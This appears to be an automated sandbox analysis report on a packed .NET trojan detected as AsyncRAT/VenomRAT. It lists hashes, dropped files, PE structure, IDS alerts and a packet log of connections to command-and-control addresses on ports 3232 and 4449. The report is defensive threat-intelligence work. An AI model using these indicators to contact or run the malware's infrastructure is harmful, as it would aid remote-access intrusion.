SHA-512:	D03D033B931F3D39F95A1EC1CDC7D9014783F11B2438C265DD72C0BC34F9D5CED534A38C7C1C88FF930868FD9CF60521DD556B5C486C5CF364F798F39215A1AA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Loader.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Loader.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c............................>4... ...@....@.. ....................................@..................................3..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B................ 4......H.......Py..........0....................................................W......H3.......W......3........./.\.....{...."..}......{...."..}......{...."..}.....~....(....9.....~....(....(.....(....n~....(....~.....(....(.....r...p.(.....(.....@....(.....A...(....f.~#...}......}.....($.....($....~....%:....&~....../...sM...%.....sN...(O...~....(..........~....o....9 ...~.....(....(G...9....~.....(.....s................s)........~J................s.........r~....o

C:\Users\user\AppData\Roaming\MyData\DataLogs.conf

Download File

Process:	C:\Users\user\AppData\Local\Temp\Client.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:Rt:v
MD5:	CF759E4C5F14FE3EEC41B87ED756CEA8
SHA1:	C27C796BB3C2FAC929359563676F4BA1FFADA1F5
SHA-256:	C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
SHA-512:	C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
Malicious:	false
Preview:	.5.False

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4215400284186215
Encrypted:	false
SSDEEP:	6144:9Svfpi6ceLP/9skLmb0OTOWSPHaJG8nAgeMZMMhA2fX4WABlEnNY0uhiTw:kvloTOW+EZMM6DFyK03w
MD5:	55B4912FDF29FD977C565B786754FA09
SHA1:	90911E46153857FDEE68370FF178C53A40F2F49E
SHA-256:	22E93AAB01F44043722BC70B9A20CBEE117071564301AAF89AF67D443453D2F2
SHA-512:	73113DE40BD49EF73EECF15B8A87E613E73274E89CDFB06426F65B0685D232EC97BD24AF00660CA09C58B9ED45E4378A3692982DB0D8D2748C7884E2F5D2CB1E
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.41440934524794
Encrypted:	false
SSDEEP:	3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5:	3DD7DD37C304E70A7316FE43B69F421F
SHA1:	A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256:	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512:	713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious:	false
Preview:	..Waiting for 3 seconds, press a key to continue ....2.1.0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.981209867564119
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
File size:	236'544 bytes
MD5:	144f1b1c4b9cdad97d8dd1a3a89e7ea1
SHA1:	1a11d76a6ab646a0d699efa0e5fc71de6e5af92c
SHA256:	e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944
SHA512:	2697bde82afdef6b3e9079e9add7a9026fffec2a9093932d6c05256fe73df0ef9a2fac4f26de28e2b5d87cc7dd0651dac80baa2a3841148409ab2c3ea32b6882
SSDEEP:	6144:TZ+geAPqybJnO5AbpbO9jhJdrz8U6n4eOP07NyGyG2qYlw5S3U19:T4FvybJNpazzfoyG
TLSH:	85341250225E902DE5133E33BF7283054ADCBE0A6D52DA2B74FC65826F078AD55D28BB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<f................................. ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x43b0be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x663CD8AA [Thu May 9 14:07:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b068	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c000	0x590	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x390c4	0x39200	ea0acf8b4bf4fe59cf08efc96dd40892	False	0.9929097716083151	data	7.992585946584666	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x3c000	0x590	0x600	6e0e8017f49995e1017d373fad02d5ad	False	0.4140625	data	4.316280081294106	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3e000	0xc	0x200	ceb6cd04345f0b4a0c3feb94343b9ce6	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x3c0a0	0x244	data			0.4672413793103448
RT_MANIFEST	0x3c2e8	0x2a5	XML 1.0 document, ASCII text			0.4771048744460857

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/23/24-15:34:03.340807	TCP	2848152	ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant)	3232	61009	66.235.168.242	192.168.2.5
05/23/24-15:34:03.427478	TCP	2052265	ET TROJAN Observed Malicious SSL Cert (VenomRAT)	4449	61010	66.235.168.242	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 15:33:55.427001953 CEST	49704	443	192.168.2.5	64.185.227.155
May 23, 2024 15:33:55.427103043 CEST	443	49704	64.185.227.155	192.168.2.5
May 23, 2024 15:33:55.427194118 CEST	49704	443	192.168.2.5	64.185.227.155
May 23, 2024 15:33:55.434734106 CEST	49704	443	192.168.2.5	64.185.227.155
May 23, 2024 15:33:55.434777975 CEST	443	49704	64.185.227.155	192.168.2.5
May 23, 2024 15:33:55.931442022 CEST	443	49704	64.185.227.155	192.168.2.5
May 23, 2024 15:33:55.931636095 CEST	49704	443	192.168.2.5	64.185.227.155
May 23, 2024 15:33:55.969552994 CEST	49704	443	192.168.2.5	64.185.227.155
May 23, 2024 15:33:55.969633102 CEST	443	49704	64.185.227.155	192.168.2.5
May 23, 2024 15:33:55.969877005 CEST	443	49704	64.185.227.155	192.168.2.5
May 23, 2024 15:33:56.023402929 CEST	49704	443	192.168.2.5	64.185.227.155
May 23, 2024 15:33:56.177187920 CEST	49704	443	192.168.2.5	64.185.227.155
May 23, 2024 15:33:56.222511053 CEST	443	49704	64.185.227.155	192.168.2.5
May 23, 2024 15:33:56.320475101 CEST	443	49704	64.185.227.155	192.168.2.5
May 23, 2024 15:33:56.320542097 CEST	443	49704	64.185.227.155	192.168.2.5
May 23, 2024 15:33:56.320602894 CEST	49704	443	192.168.2.5	64.185.227.155
May 23, 2024 15:33:56.328222036 CEST	49704	443	192.168.2.5	64.185.227.155
May 23, 2024 15:33:56.378074884 CEST	49707	443	192.168.2.5	149.154.167.220
May 23, 2024 15:33:56.378097057 CEST	443	49707	149.154.167.220	192.168.2.5
May 23, 2024 15:33:56.378148079 CEST	49707	443	192.168.2.5	149.154.167.220
May 23, 2024 15:33:56.378779888 CEST	49707	443	192.168.2.5	149.154.167.220
May 23, 2024 15:33:56.378792048 CEST	443	49707	149.154.167.220	192.168.2.5
May 23, 2024 15:33:57.031804085 CEST	443	49707	149.154.167.220	192.168.2.5
May 23, 2024 15:33:57.033567905 CEST	49707	443	192.168.2.5	149.154.167.220
May 23, 2024 15:33:57.034363985 CEST	49707	443	192.168.2.5	149.154.167.220
May 23, 2024 15:33:57.034396887 CEST	443	49707	149.154.167.220	192.168.2.5
May 23, 2024 15:33:57.034646034 CEST	443	49707	149.154.167.220	192.168.2.5
May 23, 2024 15:33:57.036782026 CEST	49707	443	192.168.2.5	149.154.167.220
May 23, 2024 15:33:57.078512907 CEST	443	49707	149.154.167.220	192.168.2.5
May 23, 2024 15:33:57.372371912 CEST	443	49707	149.154.167.220	192.168.2.5
May 23, 2024 15:33:57.372817039 CEST	49707	443	192.168.2.5	149.154.167.220
May 23, 2024 15:33:57.372833014 CEST	443	49707	149.154.167.220	192.168.2.5
May 23, 2024 15:33:57.565973997 CEST	443	49707	149.154.167.220	192.168.2.5
May 23, 2024 15:33:57.566062927 CEST	443	49707	149.154.167.220	192.168.2.5
May 23, 2024 15:33:57.566108942 CEST	49707	443	192.168.2.5	149.154.167.220
May 23, 2024 15:33:57.572531939 CEST	49707	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:00.856659889 CEST	61006	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:00.856689930 CEST	443	61006	149.154.167.220	192.168.2.5
May 23, 2024 15:34:00.856739044 CEST	61006	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:00.860003948 CEST	61006	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:00.860017061 CEST	443	61006	149.154.167.220	192.168.2.5
May 23, 2024 15:34:01.494915962 CEST	443	61006	149.154.167.220	192.168.2.5
May 23, 2024 15:34:01.496445894 CEST	61006	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:01.496454954 CEST	443	61006	149.154.167.220	192.168.2.5
May 23, 2024 15:34:01.809022903 CEST	443	61006	149.154.167.220	192.168.2.5
May 23, 2024 15:34:01.812338114 CEST	61006	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:01.812352896 CEST	443	61006	149.154.167.220	192.168.2.5
May 23, 2024 15:34:01.997817039 CEST	443	61006	149.154.167.220	192.168.2.5
May 23, 2024 15:34:02.007421970 CEST	443	61006	149.154.167.220	192.168.2.5
May 23, 2024 15:34:02.007539034 CEST	61006	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:02.012093067 CEST	61006	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:02.024446964 CEST	61008	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:02.024523973 CEST	443	61008	149.154.167.220	192.168.2.5
May 23, 2024 15:34:02.024684906 CEST	61008	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:02.024893999 CEST	61008	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:02.024914980 CEST	443	61008	149.154.167.220	192.168.2.5
May 23, 2024 15:34:02.649900913 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:02.667942047 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:02.668658018 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:02.676054001 CEST	443	61008	149.154.167.220	192.168.2.5
May 23, 2024 15:34:02.683924913 CEST	61008	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:02.684005976 CEST	443	61008	149.154.167.220	192.168.2.5
May 23, 2024 15:34:02.689572096 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:02.732809067 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:02.749501944 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:02.790774107 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:02.790864944 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:02.797404051 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:02.847513914 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:03.055135012 CEST	61008	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:03.055186033 CEST	443	61008	149.154.167.220	192.168.2.5
May 23, 2024 15:34:03.055363894 CEST	61008	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:03.055375099 CEST	443	61008	149.154.167.220	192.168.2.5
May 23, 2024 15:34:03.055618048 CEST	61008	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:03.055632114 CEST	443	61008	149.154.167.220	192.168.2.5
May 23, 2024 15:34:03.058029890 CEST	61008	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:03.058039904 CEST	443	61008	149.154.167.220	192.168.2.5
May 23, 2024 15:34:03.059791088 CEST	443	61008	149.154.167.220	192.168.2.5
May 23, 2024 15:34:03.117007017 CEST	61008	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:03.242271900 CEST	443	61008	149.154.167.220	192.168.2.5
May 23, 2024 15:34:03.243887901 CEST	61008	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:03.244154930 CEST	443	61008	149.154.167.220	192.168.2.5
May 23, 2024 15:34:03.244223118 CEST	61008	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:03.340806961 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:03.373016119 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:03.379395008 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:03.427478075 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:03.492135048 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:03.526544094 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:03.535037994 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:03.599548101 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:03.679652929 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:03.709449053 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:03.788959026 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:04.645816088 CEST	61013	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:04.645854950 CEST	443	61013	149.154.167.220	192.168.2.5
May 23, 2024 15:34:04.645941019 CEST	61013	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:04.646254063 CEST	61013	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:04.646270037 CEST	443	61013	149.154.167.220	192.168.2.5
May 23, 2024 15:34:05.286828995 CEST	61014	443	192.168.2.5	64.185.227.155
May 23, 2024 15:34:05.286916018 CEST	443	61014	64.185.227.155	192.168.2.5
May 23, 2024 15:34:05.287009954 CEST	61014	443	192.168.2.5	64.185.227.155
May 23, 2024 15:34:05.291413069 CEST	61014	443	192.168.2.5	64.185.227.155
May 23, 2024 15:34:05.291451931 CEST	443	61014	64.185.227.155	192.168.2.5
May 23, 2024 15:34:05.330101013 CEST	443	61013	149.154.167.220	192.168.2.5
May 23, 2024 15:34:05.330172062 CEST	61013	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:05.332134962 CEST	61013	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:05.332149982 CEST	443	61013	149.154.167.220	192.168.2.5
May 23, 2024 15:34:05.332387924 CEST	443	61013	149.154.167.220	192.168.2.5
May 23, 2024 15:34:05.339546919 CEST	61013	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:05.351963997 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:05.356981993 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:05.358010054 CEST	61009	3232	192.168.2.5	66.235.168.242
May 23, 2024 15:34:05.363140106 CEST	3232	61009	66.235.168.242	192.168.2.5
May 23, 2024 15:34:05.386492014 CEST	443	61013	149.154.167.220	192.168.2.5
May 23, 2024 15:34:05.635307074 CEST	443	61013	149.154.167.220	192.168.2.5
May 23, 2024 15:34:05.635663033 CEST	61013	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:05.635691881 CEST	443	61013	149.154.167.220	192.168.2.5
May 23, 2024 15:34:05.672178030 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:05.677197933 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:05.677267075 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:05.682338953 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:05.800538063 CEST	443	61014	64.185.227.155	192.168.2.5
May 23, 2024 15:34:05.800723076 CEST	61014	443	192.168.2.5	64.185.227.155
May 23, 2024 15:34:05.802510977 CEST	61014	443	192.168.2.5	64.185.227.155
May 23, 2024 15:34:05.802536964 CEST	443	61014	64.185.227.155	192.168.2.5
May 23, 2024 15:34:05.802963972 CEST	443	61014	64.185.227.155	192.168.2.5
May 23, 2024 15:34:05.843688011 CEST	443	61013	149.154.167.220	192.168.2.5
May 23, 2024 15:34:05.843784094 CEST	443	61013	149.154.167.220	192.168.2.5
May 23, 2024 15:34:05.843856096 CEST	61013	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:05.869112015 CEST	61013	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:05.893934965 CEST	61014	443	192.168.2.5	64.185.227.155
May 23, 2024 15:34:06.045368910 CEST	61014	443	192.168.2.5	64.185.227.155
May 23, 2024 15:34:06.047359943 CEST	61015	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:06.047394991 CEST	443	61015	149.154.167.220	192.168.2.5
May 23, 2024 15:34:06.047678947 CEST	61015	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:06.048495054 CEST	61015	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:06.048511028 CEST	443	61015	149.154.167.220	192.168.2.5
May 23, 2024 15:34:06.090496063 CEST	443	61014	64.185.227.155	192.168.2.5
May 23, 2024 15:34:06.176235914 CEST	443	61014	64.185.227.155	192.168.2.5
May 23, 2024 15:34:06.176428080 CEST	443	61014	64.185.227.155	192.168.2.5
May 23, 2024 15:34:06.176533937 CEST	61014	443	192.168.2.5	64.185.227.155
May 23, 2024 15:34:06.185214043 CEST	61014	443	192.168.2.5	64.185.227.155
May 23, 2024 15:34:06.188623905 CEST	61016	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:06.188663006 CEST	443	61016	149.154.167.220	192.168.2.5
May 23, 2024 15:34:06.188741922 CEST	61016	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:06.188994884 CEST	61016	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:06.189006090 CEST	443	61016	149.154.167.220	192.168.2.5
May 23, 2024 15:34:06.754160881 CEST	443	61015	149.154.167.220	192.168.2.5
May 23, 2024 15:34:06.755842924 CEST	61015	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:06.755856991 CEST	443	61015	149.154.167.220	192.168.2.5
May 23, 2024 15:34:06.907768011 CEST	443	61016	149.154.167.220	192.168.2.5
May 23, 2024 15:34:06.907847881 CEST	61016	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:06.909205914 CEST	61016	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:06.909214973 CEST	443	61016	149.154.167.220	192.168.2.5
May 23, 2024 15:34:06.909549952 CEST	443	61016	149.154.167.220	192.168.2.5
May 23, 2024 15:34:06.911129951 CEST	61016	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:06.958496094 CEST	443	61016	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.108659983 CEST	443	61015	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.108952045 CEST	61015	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.108973980 CEST	443	61015	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.109066010 CEST	61015	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.109071970 CEST	443	61015	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.109225988 CEST	61015	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.109241009 CEST	443	61015	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.110008001 CEST	61015	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.110013962 CEST	443	61015	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.257709980 CEST	61016	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.257730961 CEST	443	61016	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.316112041 CEST	443	61016	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.328895092 CEST	443	61015	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.329377890 CEST	61015	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.329413891 CEST	443	61015	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.329467058 CEST	61015	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.339467049 CEST	61017	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.339492083 CEST	443	61017	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.339677095 CEST	61017	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.339904070 CEST	61017	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.339912891 CEST	443	61017	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.437120914 CEST	443	61016	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.437199116 CEST	61016	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.438875914 CEST	61016	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.494972944 CEST	61018	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.494980097 CEST	443	61018	149.154.167.220	192.168.2.5
May 23, 2024 15:34:07.495146036 CEST	61018	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.495624065 CEST	61018	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:07.495635986 CEST	443	61018	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.055346012 CEST	443	61017	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.055432081 CEST	61017	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.057179928 CEST	61017	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.057187080 CEST	443	61017	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.057391882 CEST	443	61017	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.058682919 CEST	61017	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.102529049 CEST	443	61017	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.137449026 CEST	443	61018	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.139388084 CEST	61018	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.139411926 CEST	443	61018	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.438647032 CEST	61017	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.438667059 CEST	443	61017	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.503513098 CEST	443	61017	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.536271095 CEST	61018	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.536286116 CEST	443	61018	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.554426908 CEST	61017	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.587250948 CEST	443	61018	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.632635117 CEST	61018	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.707556963 CEST	443	61017	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.707632065 CEST	443	61017	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.707700968 CEST	61017	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.708432913 CEST	61017	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.713809013 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.713824987 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.713917017 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.714714050 CEST	61019	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.714726925 CEST	443	61019	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.811757088 CEST	443	61018	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.811939001 CEST	443	61018	149.154.167.220	192.168.2.5
May 23, 2024 15:34:08.812004089 CEST	61018	443	192.168.2.5	149.154.167.220
May 23, 2024 15:34:08.812696934 CEST	61018	443	192.168.2.5	149.154.167.220
